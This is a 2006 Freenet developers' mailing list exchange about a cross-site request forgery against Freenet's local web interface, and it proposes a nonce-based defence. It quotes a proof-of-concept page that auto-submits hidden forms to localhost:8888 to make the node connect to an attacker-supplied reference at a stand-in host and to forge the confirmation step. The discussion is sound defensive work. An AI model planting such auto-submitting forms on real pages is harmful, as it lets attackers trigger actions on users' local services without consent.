[freenet-dev] Javascript Disconnect?

Fri, 2 Jun 2006 13:48:51 +0100 

On Fri, Jun 02, 2006 at 01:41:55PM +0100, Michael Rogers wrote:
> Matthew Toseland wrote:
> >So not only can it not read a frame from a different domain, it can't
> >open one in a hidden iframe and then submit it either?
> 
> The script doesn't need to submit the same confirmation returned by the 
> server - it can just fake it like it did with the original form.

Well, yes, but if it can't do that, could it open the page in a subframe
and then submit that?
> 
> Something like this:
> 
> ...
> <script type='text/javascript'>
> function submitFirst() {
>       document.forms['form'].submit();
>       window.setTimeout ('submitSecond()', 2000);
> }
> function submitSecond() {
>       document.forms['confirmation'].submit();
> }
> </script>
> </head>
> <body onload='submitFirst()'>
> <form name='form' action='http://localhost:8888/darknet/' method='post' 
> enctype='multipart/form-data' target='hidden_iframe'>
> <input name='url' type='hidden' value='http://mallory.net/ref.txt' />
> <input name='connect' type='hidden' value='Connect' />
> </form>
> <form name='confirmation' action='http://localhost:8888/confirm/' 
> method='post' enctype='multipart/form-data' target='hidden_iframe'>
> <input name='areYouSure' type='hidden' value='Yes' />
> </form>
> ...
> 
> As far as I can see, the only way to prevent this is to put a nonce in a 
> hidden field in the form. If the nonce doesn't match when the form is 
> submitted, ignore the request and maybe alert the user.

Right. So we reconfirm dangerous operations (especially if the referer
is set to somewhere outside fproxy), with a hidden field. Will implement
that soon.
> 
> Cheers,
> Michael
> _______________________________________________
> Devl mailing list
> Devl at freenetproject.org
> http://emu.freenetproject.org/cgi-bin/mailman/listinfo/devl
> 

-- 
Matthew J Toseland - toad at amphibian.dyndns.org
Freenet Project Official Codemonkey - http://freenetproject.org/
ICTHUS - Nothing is impossible. Our Boss says so.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
URL: 
<https://emu.freenetproject.org/pipermail/devl/attachments/20060602/d0fac0f6/attachment.pgp>

Reply via email to